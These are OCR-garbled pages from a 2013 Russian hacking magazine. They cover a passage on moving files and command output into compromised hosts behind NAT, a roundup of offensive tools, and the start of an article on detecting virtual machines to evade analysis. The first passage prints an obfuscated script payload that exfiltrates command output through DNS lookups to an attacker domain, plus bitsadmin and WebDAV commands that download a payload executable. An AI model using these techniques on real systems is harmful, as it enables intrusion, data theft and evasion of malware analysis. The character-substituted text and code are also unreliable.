адрес прокси-сервера в зависимости от запрашиваемого хо- 
ста. 


СВОЧР РОНЦСУ 
Групповыми политиками назначают РАС или отдельно прокси- 
сервер для протокола. 


ОЗЕАСНОСЕ 


Прокси-сервер не назначается администратором домена. 


ОС ОЕЕРЕВ 

Рассмотрим такую ситуацию: успешная эксплуатация хоста ->› 
привилегии МТ АЧТНОВПУ\$УЗТЕМ -› прокси-сервер на- 
строен у пользователя. Следующим шагом необходимо уз- 
нать адрес прокси-сервера. Вполне логично предположить, 
что пользователей может быть несколько с различными прок- 
си-серверами, в зависимости от групповых политик. Возни- 
кает резонный вопрос: каким образом можно получить вывод 
исполнения команды? Стоит отметить, что сетевые настройки 
общие для системы, в том числе ОМ$. А в большинстве случаев 
внутренний ОМ$ является авторитативным и сам разрешает до- 
менные имена в |Р-адреса. Таким образом, имея подконтроль- 
ный ОМ$-сервер с настроенным логированием, отвечающий 
за нашу зону, мы сможем просматривать вывод команд. Реали- 
зуется это следующим образом: 


тзИфа "}]ауа$сг1р*: РипсЕ1оп И(ои®)-= 

{пха=' ";Рог(а=@; а‹ои* .1еп?ЕИ ; а=а+1) {Ихд=Иха+ои* . == 
срагСодедЕ (а).+05$г1п5(16); }гефигп Иха; }РипсЕТоп += 
г(ста){уаг °Ие11=пем АсЕ1уехоО6Зесе( "М5сг1ре.5Ие11'); == 
уаг зе=$5Ие11.Ехес (ста); уаг оч = '';мИ11е (1+ 
(зе.5Еа0и* .АЖЕпдОР${геат)){оцч{=ои+$е.5аА0и* . «= 
ВеаЧЕ1пе(); }гефигп оц; }РипсЕ1оп ех(ста){уаг оч=еы 
п(г(стма)) ; ачегу=ои*{ .мафсй(/.{1,60 ; Рог (М=0; \+= 
<ачегу .1епя В ;\=\+1){г(‘пз1оокир "+\+'х'+ачегу [м ] ++ 
'. уа.ги')}; }РипсЕ1оп е(){ех('ргохусЕ') ; }м1пдом. «= 
оп1оад=е" 


Если у нас привилегии пользователя, то настройки прокси 
можно посмотреть так: 


>>= М1пдом$ \15%а (зузет ргоху) 
пей мтийЕЕр $зПом ргоху 


>>= М1паом$ \1$%а (ТЕ ргоху) 
ге ачегу "НКЕУ_СУВКЕМТ _У5ЕК\$0+маге\М1сго$о+\+ 
Итиаом$ \Сиггеп\/ег$1оп\Тифегпее 5е{1п55" /\м += 


Ргохуъегуег` 


> И1паом$ ХР & 2003 (ТЕ ргоху) 
пеф$Н 41а> соппесе 1ергоху 


> И1паом$ ХР & 2003 (зуз%ет ргоху) 
ргохус+5 


Установка настроек прокси-сервера: 


>>= М1пдом$ \15%а (зузет ргоху) 
пеф$й м1ийЕЕр зе ргоху ргоху: 3128 


АА 


Презентация доклада: 
Би у/11сТН и 


Небольшой «спеа{ 


зпееф»: Би. /у/ЛЛуМт М 


Демо использования 


п$оокир: БИ.1у/15и 0 Е4@ 


Демо использования 


апу2бат: Би. 1у/11ЛуМхЕН 
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>>= И1паом$ \1$Фа (ТЕ ргоху) 

5ет-Т&етРгорегфу "НКС: \боРмаге\М1сго$о+\и1п40м$ \+= 
Сиггеп{\/ег$1оп\Тиегпе* $е{{1п5' -пате ++ 
РгохуЕпа6]1е -уа1че 1 $е{-ТетРгорегфу ‘НКСМИ: \‹= 
5оЕмаге\М1сго5о т \И1паом$ \СиггепЕ\Мег$1оп\+ 
Тизегпее 5$е%{{1п25' -патме Ргоху$егуег "ргоху: 3128" 


> И1паом$ ХР & 2003 (ТЕ ргоху) 
ргохус+в -р ргоху: 3128 


> И1птаом$ ХР & 2003 (зуз%ет ргоху) 
ргохус+= -И 


\МУЕВОАУ 
Рассмотрим шаги для установки \М\ебОА\ на Араспе. Энэйблим 
модуль \\/еб АХ: 


а2епто Чау_+$ 
а2епто ам 


/[ефс/1п1*.9/арасйе? гезфаг* 


Настраиваем \\ебВА\ 


шка1“ -р /маг/ммим/меь / 


спомп ммм -Чафа_/уаг/ммим/ мер / 


\1т /ефс/араспе2 /$11е$-ауа11а61е/аеРаи1 
Мате\/1 Е иа1Но$Е * 
<\/1гфиа1Но$* *> 
$егуегАдт1п мерта${ег@1оса1по$* 
ОоситепЕКоо* /маг/ммм/меБ / 
<О1гесфогу /маг/мим/меь/> 
Ор{1опз Тпаехез Ми1{1\/1ем$ 
А11омО\уегг1ае Мое 
Огдег а11ом, аепу 
а1]ом фгот а11 
</01гесфогу> 
А11аз /мебаау /маг/мимм/меь / 
<Госае1оп /меБадам> 
ОА\ Оп 
</ГосаЕ1оп> 
</М1гЕца1Но$Е> 


/[ефс/1п1%.Ча/арасйе? геТоаа 


Готово! Теперь можно использовать наш уютный сервис 
с удаленной машины :). Например, существует множество спо- 
собов примонтировать свежеиспеченный ресурс: 


пее изе х: Ир: //1.2.3.4/мебаам 

пеЕ че х: Ир$з://1.2.3.4/мебдау /изег:биезЕ бие$+ 
пе ие х: \\1.2.3.4\мебадау 

пеЕ ие х: \\1.2.3.4@5$1@53\меБадау 

пеЕ изе х: \\1.2.3.4@53\мебдам 


После чего, удачно смонтировав ресурс, копируем необхо- 
димый файл командой сору :) 


сору Х: \рау1оа@.ехе С: \рау1оаа .ехе 


МУГООКУР 

М$юоокир является средством администрирования на ос- 
нове командной строки и предназначена для проверки ра- 
ботоспособности ОМ№$-серверов. Имеет два режима рабо- 
ты: интерактивный и консольный. Если нет возможности 
установить ТСР-соединение с подконтрольным сервером, 
то можно использовать внутренний ОМ$ для обмена данны- 
ми с сетью. В 2008 году Кевин Бонг (Кеут Вопд) рассмотрел 
и реализовал способ создания неинтерактивного шелла че- 
рез опрос ТХТ записей (6 и.1у/14а/ Сум). Максимальная дли- 
на 1х1 — 255 символов. Все кавычки в записи должны быть 
экранированы. Так как вывод пз1оокир не содержит испол- 
няемых команд, можно сделать проще и короче: заэкрани- 
ровать обязательные обрамляющие кавычки и записывать 
вывод в Ба. 


ХАКЕР 07 /174/ 2013 Грузите файлы пачками! 


я. атитсгатог” мп 


Р5 С:\> пзПоокир -Еуре=ТХТ уапдех. ги 
эзегмег:  УпкКпомп 
Адаге5 с: 192.168.152.2 


№оп-аиРог1Татуе апзмег: 
уапдех. ги фехЕ = 


"таз ]ги-уегтРлсаетоп: 530642561458283е" 


уапаех. ги ЕехЕ = 


"м=$рР1 гедтгес+е=_$рГг. уапдех. ги" 
ых 


Правим запись 1% для подконтрольного домена (с1. 
аЦаскег.сот): 


\" & @еспо ^‹раскКаве^>^‹саб хт1п$ : а{=\"игп : = 
°спета$ -т1сго$о+*- сот: дафафурез\" а{:а{=\"Ь1 п. = 
Базеб4\"^> ›рау1оаа & \" 


После чего на клиенте запускаем пзюокир и перенаправля- 
ем вывод в файл: 


п$]1оокир -+уре=ТтТХТ с1.аФаскКег.сот >> рау1оаа.Бае «= 
& рау1оаа.Ба* 


РО\МЕВАЗНЕЦ. 

Это фреймворк, созданный МГсго$о8, для автоматизации задач 
системного администрирования. Имеет СЧ, подобный СМО, 
со встроенной поддержкой и интеграцией .МЕТ Егатемогк. 
Разработка началась в 2002 году под названием Мопаа. Пер- 
вая АС-версия появилась в 2006 году и была переименована 
в \/тао\$ Роммегэпей. С выходом \\/Итаом/$ \М$а ЗР1 поставля- 
ется как компонент ОС. М/паом/$ 8/2012 поставляется с третьей 
версией, значительно расширенной командлетами. \\ЛЛпо\м/$ 
17/2008 поставляется со второй версией. 

Ромегэве! — это такой слой абстракции, который делает 
удобной работу с компонентами системы: СОМ, М/М|, АОЗ. 
В результате мы имеем простой унифицированный способ 
управления системой локально или удаленно. 

Функциональность РомегэПе! обеспечивается командле- 
тами — специальными командами, реализующими конкрет- 
ный функционал. Например, командлет Сщ-Сощет или его 
алиасы дс и са! — получить содержимое файла. При написа- 
нии командлетов принято придерживаться именования уегь- 
поип. Результат командлета — это объект или коллекция. При- 
меры кода, реализующего слив файла, ты найдешь на нашем 
диске. 


ВИТЗАОММ 
\\МаЕ для \ММтао\м$ :). Этим все сказано. Параметры запуска до- 
статочно просты: 


615адт1п /ЕгапзРег мПафеуег Ир://1.2.3.4:80/-=- 
рау1оа4.ехе с:\рау1оа9 .ехе 


Или же можно создать целую задачу для загрузки серии 
файлов с удаленного ресурса: 


61{5адт1п /СКЕАТЕ /БОММЕОАВ Зобпате 
61{5а@т1п /АБОРТЕЕ Зобпаме ВЕр://1.2.3.4/+= 
рау1оа@1 .ехе р1.ехе 

61Е5а@т1п /АОБЕТЕЕ Зобпате Ир://1.2.3.4/-= 
рау1оа42 .ехе р2.ехе 

61Е5аатлп /КЕЗУМЕ Эобпате 

61Е5аат1п /СОМРЕЕТЕ Зобпате 


Стандартный вывод 
пЗоокир —туре=ТХт 


уапаех.-ги 


Данная статья основана на выступлении Вячесла- 
ва Егошина на Розйме Наск Пауз 2013. Напомню, 
РНОау$ — это международный форум, посвящен- 
ный вопросам практической информационной без- 
опасности. Своим появлением РНЬО поставил точку 
в разговорах хакерской тусовки, посвященных идеям 
на тему «Как было бы круто иметь свой РЕРСОМ или 
Васк На в России». Мы получили оба в одной бутыл- 
ке :). РНБау$ — это место, где футболки встречают- 
ся с пиджаками, а парни с Античата обсуждают ре- 
зультаты взлома интернет-банка с топ-менеджером 
из финансовых структур. Презентация, по моти- 
вам которой подготовлен этот материал, доступна 
по адресу =1Чээла.гэо/ 1970 уз. Информацию о самом 
мероприятии, а также список доступных материалов 
ты можешь посмотреть на официальном сайте этой 
уникальной хакерской конференции (лллм.олЯауз.ги). 


и | и 
пин бони 


ВМЕСТО ЗАКЛЮЧЕНИЯ 


В своей статье я постарался подробно прояснить 
ситуацию с загрузкой файлов на машины за МАГом. 
Надеюсь, что это хорошая отправная точка для даль- 
нейшего ресерча и изучения множества других кле- 
вых «хаков». Если у тебя остались вопросы или ком- 
ментарии, я с радостью на них отвечу. Удачного тебе 
закрепления на удаленной машине! {ау типеа! 


55 Взлом 


У\УАВММС 


Внимание! Информация представлена исключи- 
тельно с целью ознакомления! Ни авторы, ни редак- 
ция затвои действия ответственности не несут! 
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Дмитрий «0191» Евдокимов, 
Оо На! Зесийу 
@е\удоКтоу@$ 


Х-ТООЕЗ 


СОФТ ДЛЯ ВЗЛОМА И АНАЛИЗА БЕЗОПАСНОСТИ 


в зыыят Автор: МСС @гоир 
но бы Система: \Ип0о\$/ 

то: о 1 о . 

вы * а Ипих 


лы Маю СТК 
ори вит9 собагя тия Нея Киа! 1! 


пссогоир.о Пир. 10/ 
рр те/падех. Пт! 


И ет 40 ыы у 
0% 61 07 6% 04 6% 61 м о ме 
в комом 44 
ут 4 тк м 
зева м 
феер оу Зета 


$2 47 46 9 44 $7 . 
. № БИ ытху 
050043 2294242591 м4ы  шыню 
60 оно инмямс Це тоеь соресы9 


ИГРАЕМ С БАЙТИКАМИ 


Если тебе часто приходится иметь дело с не- 

обработанными/сырыми массивами байтов, 

то инструмент под названием Рр3З!те как раз 

для тебя — он упростит твою работу. Если корот- 

ко, то это просто инструмент для манипуляции 

над массивом байтов, при этом в инструмент 

заложен набор стандартных преобразований, ко- 

торые можно применять как в одну сторону, так 

и в обратную. Для преобразования достаточно 

выделить необходимые байты и выбрать тип пре- 

образования над ними. Рр3З!те поддерживает 

множество различных трансформаций, таких как: 

. Вазе32/Вазеб4; 

. Випагу епсоатд; 

‚ Ведщаг Ехргеззоп (тасп&ежгасф, 
тасй&гер!асе); 

. ПИ Епсоае; 

‚ Хог; 

. 116 сотргеззоп; 

. Ма4/Ма5/5па1; 

.  ЗибзНиНоп сгуро азогИйт. 


В процессе работы с инструментом можно 
вернуться в любую точку цепочки преобразова- 
ний, выполненных над файлом. При этом преоб- 
разования можно выполнять над группой файлов 
или над блоками данных, полученными из ТСР 
зоска, Матеа Ре (\\ММпаом/5) или УМХ Зоске 
(ИМХ/\пих). 

Но всем этим функционал программы, ко- 
нечно, не ограничивается. Авторы программы 
потрудились и создали специальный интер- 
фейс для плагинов, благодаря которому можно 
на С++/С{ писать собственные преобразователи, 
а как альтернативный вариант можно использо- 
вать и всеми любимый РУПоп. 


АИ Чгогиез Ч с Автор: ЗепзеРо${ 
Е 68:09:27:6е:92 | 
Анн СР Манетелн Система: Мпих 
ыы | - | - -- | а 
Е ВЫ рз: //аиИиЬ.сот 
20:64: 32:34: 1514 зепзероз/Зпоору 
8:9 зи 1 
ме г. 
мВ Сб к: та 

1:48:45 69-2 
ПОД КОЛПАКОМ $МООРУ 


Как говорят сами авторы проекта Зпоору, на его 
создание их вдохновила активная в последнее 
время деятельность государств, легализующих 
слежение за гражданами в интернете (посещае- 
мые веб-сайты, почта, социальные сети и так да- 
лее) под предлогом борьбы с терроризмом. 

Зпоору — это распределенный трекинговый 
и профилирующий фреймворк, позволяющий 
производить слежку за мобильными устройства- 
ми, использующими \/\/-Е!. Почему распределен- 
ный? Потому что клиентская часть программы 
может быть установлена на любое устройство под 
управлением ОС Ипих (телефон, роутер, мини- 
ПК) с поддержкой режима монитора и инъекцией 
пакетов. И каждое такое устройство с клиентской 
частью будет отсылать данные на центральный 
сервер. Среди отсылаемой информации: 


. время; 
. МАС клиента; 
‚ ОУ сети; 


. ОР5$-координаты; 
. уровень сигнала. 


Программа также способна идентифициро- 
вать устройства владельцев через $$ сетей 
и захваченные ргоБе запросы. И это может быть 
сделано двумя способами: простым анализом 
и с помощью геолокации (через такой сервис, 
как \\Ла!е). Помимо этого, программа умеет про- 
изводить МИМ-атаку и извлекать данные из тра- 
фика (сооке, логины и пароли, РОЕ \МоР-звонки 
и так далее) и даже такую информацию, как спи- 
сок фолловеров в Тм Щег и все друзья из Гасероок. 

Также хочется сказать, что у программы удоб- 
ный веб-интерфейс для просмотра результатов 
и интеграция с МаКеодо. 


Автор: Уатск 
Егааптопю 


зне1]1пооь.ру —1 <# Система: \\пдом5/ 
зне11п00Ъ.ру -с СШ 

оп1у Хе» р1абЁРокт | 
5Не11по0оЪ.ру —-64 И рз: //айпиб. сот 
геуаттег/5пе!поо6 


$йе1]по0ь.ру ——-чеЕ 
$Не1]по0оь.ру —2чеё 


зиррокЕейЯ ТМРИТ Фо 
зиррокбейЯ ОПТРОТ # 3 


ПОМОЩНИК ШЕЛЛ-КОДЕРА 


Написание шелл-кода обычно состоит из двух 
частей: суперувлекательной и чрезвычайно 
муторной, скучной. Благодаря инструменту 
Зпе!пооб можно сфокусироваться на первой ча- 
сти, а остальное возложить на плечи данной раз- 
работки. Особенности: 

. конвертирование шелл-кода между различ- 
ными форматами (сейчас поддерживаются: 
азт, Быт, Пех, об}, ехе, С, РУпоп, ВиБу); 

. интерактивный режим преобразования 
орсоае-то-ЫШтагу (и обратно); 

. определение номеров зузсай и констант (те- 
стовая поддержка); 

. портативность (необходимо только @СС/а$/ 
обаитр и РУПоп); 

. работа прямо на целевой архитектуре; 

. вставка брейкпоинтов; 

. Переключение между 3264/6401; 

. поддержка чтения из зат / записи в ${40щ. 


Рассмотрим пару примеров использования. 
Конвертирование шелл-код-файла на ассембле- 


ре вбинарный формат: 


. /5Ие11пооб.ру --Егот-азт «= 


Работа в интерактивном режиме, где получа- 
ем орсоде-инструкции: 


$ ./5Ве11пооб.ру -1 

1п5_фо_орсоае (1) ог орсоде фо_1п$ «= 
(22-1 

1п$_фо_орсо4е зе1ес*еа 

>> тоу фХеах, %ебх 

то\ %еах, %ебх -> 89с3 


Х-Тоо/5 
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Автор: 15ЕС РаЦпег$ 
Система: Апаго!а 


ПЕр$://аНпиб.сотЛЗЕСРацпег/апго!а-551-бураз$ 


Автор: М/А 
Система: М/А 


53.еигесот.Н/о0|$/ 


астаеоп 


РЕогепзс$ в УМ 


Астаеоп — это инструмент для экспертизы памя- 
ти в виртуализированном окружении. Начиная 
работу с физическим дампом памяти, инстру- 
мент способен достичь трех важных целей: 

1. Обнаружить любой гипервизор (ущиа! 
пасйште топКог), который использует техно- 
логию Ее! \МТ-х. 

2. Обнаружить и проанализировать пезеа 
миайгайоп и показать отношения среди раз- 
личных гипервизоров, запущенных на одной 
машине. 

3. Предоставить транспортный механизм 
для распознавания и поддержки адресного 
пространства виртуальных машин. 


АСаеоп состоит из трех компонентов: 
. Пуреп5$: плагин для Мо!апу; 
. патч для Уоаку; 
. Дампер\/МС$, основанный на коде НурегОВС. 


Инструмент работает независимо от гипер- 
визора и ориентируется на расположение УМС$ 
структур данных в памяти. Таким образом, он дол- 
жен быть способен обнаружить любой гипервизор 
(хороший или вредоносный), который использует 
эту технологию. Программа прошла успешное 
тестирование с К\М (Кете! 3.6.0), Хеп (4.2.0), 
\УМ\мх/аге \ММогкзайоп (9.0.1), МчцаВох (4.2.6) и по- 
следней версией НурегОВС — включая различные 
вложенные комбинации (например, К\М под ХЕМ 
или \/МицаВох под \/Мм/аге). Пока программа те- 
стировалась только с 32-битными системами. 

Для успешной работы программы и, в принци- 
пе, ее дальнейшего развития (поддержки новых/ 
других УМ) необходимо знать смещение опреде- 
ленных полей внутри УМС$-структуры. 


В ОС Апаго для защиты приложений также мож- 

но использовать сейЯсае ртпо, и для этого не- 

обходимо специальное доверенное хранилище. 

Об общих методах реализации сеййсае ртпта 

читай в блоге Може (БИ.1у//55тпхп). Технология ак- 

тивно используется в таких Апагоа-приложениях, 

как Сооде Спготе, ТммЩег, Сага$.ю. Существует 

множество путей обхода сегсае ртптоао: 

. Ддекомпиляция/патчинг/перекомпиляция/под- 
пись/загрузка; 

._ кастомные УМ/ВОМ со встроенными хуками; 

. хукер нативного кода или отладчик нативного 
кода (ООВ, УТгасе); 

. У0О\Р-отладчик. 


- —- Автор: Мо0п5015 
Система: \//п0о\м$ 


р с0т/2011/07/19/ 
ри пем-иЙу-тооп$0!$- 
м Пуреназктог-м1-0/ 


ыы 
РРР АВИН 
т АСЕ 
ааа 5 
чи 


НУРЕВ-\У БЕЗ ГРАНИЦ 


Если говорить официально, то  Мооп$01|5 

НурегГазКМог — это предназначенный П- 

профессионалам менеджер задач нового по- 

коления для управления \М/Иптаом/з$ \М, запу- 

щенными под М!сго$ой Нурег-\ В2 Нурегиб5ог. 

НурегТазКМог просто запускается на хостовой 

машине (представляет собой один ЕХЕ- и один 

ОШ -файл) и не требует установки. С его по- 

мощью можно легко увидеть всю информа- 

цию о процессах внутри гостевых \УМ на базе 

\ММпаом/$, и при этом ничего устанавливать на них 

не надо. 
Данная версия позволяет: 

. отобразить все процессы внутри МИпаомз УМ 
и используемые ими ОШ-библиотеки; 

.‚ убить любой процесс в \М; 

. предоставить на лету привилегии ЗУЗТЕМ 
к любому процессу внутри \М; 

. разблокировать \М, если ты не помнишь па- 
роля :); 

. включить тМоае ехр!оцайоп против эксплой- 
тов, использующих «РгЖес{ адат${ пи! раде 
аНаск». 


Защита против пи! раде аКаск базируется 
на основе исследования Тарьей Мандта (Таце! 
Мапа), и подробнее об этом можно почитать тут: 
Би.1у/170МЕ4. 

В принципе, эта фича напоминает то, что де- 
лает ЕМЕТ (Еппапсеяа МИюданоп Ехрепепсе 
ТооКй), но только для режима ядра. Как видно 
из возможностей инструмента, его можно при- 
менять не только для простого управления вир- 
туальными машинами, но и при проведении 
пентестов, когда получается завладеть хостовой 
машиной, где уже развернута Нурег-\-среда. 


ДАЕМ БОЙ СЕВТИЕ!САТЕ 
РИМММС НААМОВО!О 


Чауа ВБебид \М/ге Ргоюсо! ()ОМР) — это стан- 
дартный инструмент отладки для чЧама, кото- 
рый может программироваться через уауа АР! 
и для своей работы задействует уауа ОеБид 
|чегасе (40|. Это и используют авторы инстру- 
мента Апагоа ЗЭ5ЁЕ Вура$$ для обхода сеййсае 
ртпто. Алгоритм работы программы таков: 

. остановка на НИрзУВЕСоппесйоп. 
забоскаРГасогу(); 

замена переменной на переменную, означаю- 
щую «доверять всем»; 

. продолжение работы. 


Тулза протестирована на Апагог 2.3.3 и 4.0.3. 


Автор: 
|пгери$ @гоир 
Система: 105 


ПИрз: //оипиб.сот 
игеризагоир/ 


{гизте 


ДАЕМ БОЙ СЕВТИЕ!САТЕ РИ!МММС НА!О$ 


Разработчики не стоят на месте и придумывают 
все новые и новые механизмы для обеспече- 
ния безопасности своих приложений. Сеййсае 
ртпта как раз одно из свежих и постепенно наби- 
рающих обороты веяний в области безопасности 
мобильных приложений. Если раньше, проводя 
атаку МТМ $$Е на приложение, мы праздновали 
успех (прокси выдавала себя за сервер), то с при- 
менением се са{е ртпта ситуация изменилась 
совсем не в пользу атакующего. Теперь возмож- 
ны ситуации, когда прямо в приложение вшит 
сертификат сервера или вшит СА-сертификат, 
которым подписан сертификат сервера. Таким 
образом, приложение уже знает, кому стоит дове- 
рять, а кому нет. И это дополнительно защищает 
при компрометации сертификатов верхнего уров- 
ня (вспомни случай с П[лдтаюг). Например, это 
уже применяется в Соое Спготе с 13-й версии 
для всех Сооде-сервисов. Для мобильных при- 
ложений это очень удобно, поскольку, как прави- 
ло, они общаются с одним сервером или с очень 
ограниченным их числом. 

Это все значительно осложняет анализ сете- 
вого трафика при аудите приложения. Но выход 
существует. На платформе $ есть замечатель- 
ный инструмент под названием 0$ ЗЕ КИ Эм сп, 
который написан с использованием библиотеки 
МобИеЗиюзие. Он перехватывает конструк- 
тор МЗУАЕСоппесНоп и подменяет в функции 
пИМ/(АВесаие$ параметр аведае, через который 
часто реализуют кастомную проверку сертифика- 
та (сет Ясае ртптоа — это частный случай). 

Кстати, для этих целей есть еще более удач- 
ный инструмент под названием Тги${Ме, он также 
реализован в виде МобИезЗибгае и перехваты- 
вает ЗесТгиЕуа!аще, на более низком уровне. 


^^ „а _ — = — 
`. МаГигаге == _ 


ДЕТЕКТИМ 


ВИРТУАЛКИ 


ОПРЕДЕЛЯЕМ ФАКТ ЗАПУСКА 
ПРИЛОЖЕНИЯ В МВТОЧАЕВОХ, 
\/М\ММАВЕ МОВКЗУТАПОМ, МВТОАЕ 
РСИ РАВАЕЕЕТЗ$ МОНВКУТАПОМ 


Не каждому хочется, чтобы его, кхм, 
новый текстовый редактор какие- 
нибудь неприятные дядьки исследовали 
под виртуальной машиной. Детект 
виртуалок — обязательный функционал 
определенного рода софта, и поэтому 
наша рубрика ну совершенно никак 

не может обойтись без обзора 
соответствующих способов! 


У 


Евгений Дроботун 


зы = =—— ма а — 
= == зы мине - 
чи = =. 
и "2 32 — = ых -—- 
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-. == 
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КАК РАСПОЗНАТЬ ВИРТУАЛЬНУЮ МАШИНУ? 
Во-первых, любая виртуальная машина несет на своем борту 
какое-нибудь специфическое оборудование. Это касается ви- 
деоадаптера, жесткого диска, идентификатора процессора, 
версии ВО$, МАС-адреса сетевой карты. 

Во-вторых, виртуальные машины оставляют следы в систе- 
ме в виде запущенных вспомогательных процессов, драйверов 
и других специфических объектов. 

В-третьих, если как следует покопаться в реестре виртуаль- 
ной машины, там можно найти много всяких интересных клю- 
чей, характерных только для виртуальных машин. 

Ну и в-четвертых, некоторые производители специально 
оставляют возможности, позволяющие обнаружить их продукты. 

Что же касается общих признаков наличия виртуальной ма- 
шины, предложенных в свое время госпожой Рутковской (ха- 
рактерное расположение таблиц 10Т, СОТ и (ОТ, а также время 
выполнения операций процессором), то в настоящий момент 
все эти признаки трудно поддаются анализу и приведению 
к какому-нибудь общему знаменателю, главным образом из-за 
многоядерности и многоликости современных процессоров. 


АНАЛИЗИРУЕМ ОБОРУДОВАНИЕ 

Начнем, пожалуй, с жесткого диска. Если посмотреть иденти- 
фикатор жесткого диска в диспетчере устройств на виртуальной 
машине, то в его составе можно увидеть интересные строчки: 


01$К\/1г%ица1 для \1г%ца1 РС 
01$К\/ВОХ _НАВООТЗК для \/1гфица1Вох 
Ргоа __\/Ммаге_\1г{иа1 для \Ммаге МогК$фае1оп 


Самый простой способ узнать наименование жесткого 
диска — прочитать значение ключа с именем «0» в ветке ре- 
естра НКЕМ\НААБМ/АВЕ\ ЗУЭТЕМ\СитетСотго Зе \Зегмсез\ 
О15К\Епит. 

В этом месте перечисляются все дисковые накопители в си- 
стеме, и первым, как раз в ключе с именем «0», будет тот диск, 
с которого произошла загрузка системы. 


Я ГЕ о ИЕ 


ЕЙ 
| 
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Файл 


во 


ВЕС.О 


Компьютер\НКЕУ (ОСА! _МАСНИЧЕ\$У5ТЕМ\СитегиС опиго! бе \5еглсе\ОБК\Епигл 


Как читать реестр, я думаю, ты знаешь. Используем сначала 
АР! ВедОрепКеуЕх для открытия нужного ключа, далее с помо- 
щью ВедОчегу\/ашеЕх читаем значение. Выглядеть это должно 
примерно вот так: 


// Открываем нужный ключ реестра 
ВегОрепКеуЕхА (НКЕУ 1 ОСА _МАСНТМЕ, “"НАВОМАВЕ \ \+= 
5УЗТЕМ\ \СиггепЕСопго15е*\\5ег\у1сез\\01$К\\+ = 
Епит", 9, КЕУ_ОЧЕВУ МАГУЕ, &гКеу); 


// Читаем значение 
ВегОцегу\/а1иеЕхА(гКеу, "9", МУШЕ, &Туре, == 
(ЕРВУТЕ)ВеёКеу, &ВезёРатеИ); 


/[/ Закрываем все, что открыли ранее 
ВегС1о5еКеу (гКеу); 


Далее все просто — используем г! для поиска нужных 
нам строк в считанном значении и, в зависимости от результата 
сравнения, делаем вывод. 

Версия ВО$ содержится в ключе `Зу$етРгодисМате` 
в ветке НКЕМ\НААБ\МААЕ\ОРЕЗСЕРТОМ\Зует\В!О$. К при- 
меру, для \/М\иаге там будет лежать строка «\/М\маге Мтиа! 
РаМогт», а для У[иа!Вох — «\/ВОХ -1». Прочитать это все можно 
с помощью все тех же АР! — ВедОрепКеуЕх и ВедаОиегу\ашеЕх. 

Данные о видеоадаптере можно подглядеть в НКЫМ\ 
бучет\СаптетСоптое\Епит\РС!. В этой ветке перечисле- 
но все, что подключено к шине РС, в том числе и видеокарта. 
Для УщиаРС это строчка вида УЕМ_53338&О0Е\У 88118&$518В$У 
5 00000000&ВЕ\У 00, которая определяет видеоадаптер $3 
Типо 32/64, эмулируемый виртуалкой от Мсго5ой — на реаль- 
ном железе такое оборудование нынче днем с огнем не сы- 
скать (а у меня такая была в конце прошлого века. — Прим. 
ред.). Для \МииаВох видеокарта описана последователь- 
НОСТЬЮ \УЕМ_ ВЗО0ОЕЕ&ОЕ\У ВЕЕР&ЗУВ$\У$ _00000000&РВЕМ 00, 
что расшифровывается как «\/тиаВох О1зрау», а у Рагайе!$ 
\Могк$аноп — строка МЕМ_1АВ8&О0ОЕ\У 4005&$518В$\$_04001АВ8 
&РВЕ\ 00 определяет видеоадаптер «Рагайе!$ Отзрау». 

Помимо этого, в \МУйиаВох можно найти строку 
\УЕМ_ 8ОЕЕ&ОЕУ САРЕЗЗУВ$У$ 00000000&ВЕМ 00, определя- 
ющую некий «\/МиаВох ОШемсе», а у Рага!е!$ ММогк$Зайоп строки 
\УЕМ_1АВЗ&ОЕ\У 4000&54В$У$_04001АВ8&ВЕ\М_ 00 и\УЕМ_1АВ8& 
ОЕ\ 4006&$54В$\"$_04061АВЗ&РЕМ 00, определяющие «Рага!е!$ 
Тоо!5 Оемсе» и «Рага!е!$ Метогу Сотто!ег» соответственно. 

Алгоритм действий следующий: пытаемся открыть нуж- 
ный нам ключ, и если он открывается успешно, то оборудова- 
ние, описанное этим ключом, в наличии и можно делать вывод 
о присутствии какой-либо виртуальной машины: 


1+ (КеёОрепКеуЕх (НКЕУ_ТОСАЕ_МАСНТМЕ, <= 
-"$У$ТЕМ\ \СиггепЕСоп*го1$е*\\Епит\ \РСТ\\+= 
\\ЕМ_5333&0Е\_8811&$18В$У$_00000000&ВЕ\_00" ‚0, -= 


Идентификатор жест- 
кого диска Уи1иа Вох 


Версия В!О$ РагаПе!$ 
\М/огкзтаНоп в реестре 


Фейл Приже Цид Мрбре мное Справка 


ЦВ НКЕУ_СЬАЗ$ЕЗ _КООТ 
{В НЖЕУ.СУВЯЕМТ_05ЕВ 
«_ | НКЕГ ОСА МАСНИМЕ 


Тит Змачение 
25 (По умолчанию) 4 (знечение ме присвоено} 
7$ Воспдисриескиее ЕС. ОМОВО 0500000003 (3) 
7% Сар ин КЕС_ОМОВО 05400000405 (1029) 
1%; СотропейЕ Ти ситланоя АЕС_ВОЧАЯУ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
2 Сопйдшеаноп Ома АСС РОШ. РЕЗО... НИНУННННОО 0000 00 02 00 0000 05 00 00 00... 
о белая 186.52 АТ/АТ СОМРАПВИЕ 


КЕУ_ОЧЕВУ МАГОЕ, &гКеу) == ЕВВОВ_5УССЕ$$) { 
ВеёС1о5еКеу (гКеу); 
//_ Мы под \1гЕца1 РС 
гефигп гие; 


Идентификатор процессора определяется с помощью 
команды сриа. Благодаря ей можно получить много всякой 
полезной информации об установленном процессоре. Вид 
выдаваемой этой командой информации зависит от содержи- 
мого регистра ЕАХ. Результат работы команды записывается 
в регистры ЕВХ, ЕСХ и ЕОХ. Подробно про эту команду можно 
почитать в любой книге по программированию на ассембле- 
ре. Для наших целей мы будем использовать эту инструкцию, 
предварительно положив в регистр ЕАХ значение 0х40000000: 


аът 


тоу еах, 90х40000000 
сри1а 

тоу ТО_1, ебх 

тому ТО_2, есх 

тоу ТО_3, еах 


У ИНИ 


После выполнения этого кода на \/М\маге ММогкЗаНоп в пере- 
менных 10_1, Ю_2 и 3 будут записаны значения 0х61774456, 
0х44566572 и 0х65726177 соответственно (в символьном пред- 
ставлении это не что иное, как «\/Мм/аге\/М\ухаге»), на МУ|иаВох 
в Ш Тив Ш 2 будет лежать значение 0х00000340, а на Рага!е!$ 
\Могк$айоп в 10_1 0х70726с20, в 0_2 — 0х68797065 ив Ю 3 — 
0х72762020 (что соответствует строке «ри Пурег\»). 

Использование МАС-адреса для идентификации произ- 
водителя сетевой карты, конечно, не самый надежный спо- 
соб (ибо МАС-адрес довольно-таки просто поменять), но тем 
не менее его вполне можно применить для детекта виртуальных 
машин в качестве дополнительной проверки. 

Ты наверняка знаешь, что первые три байта МАС-адреса 
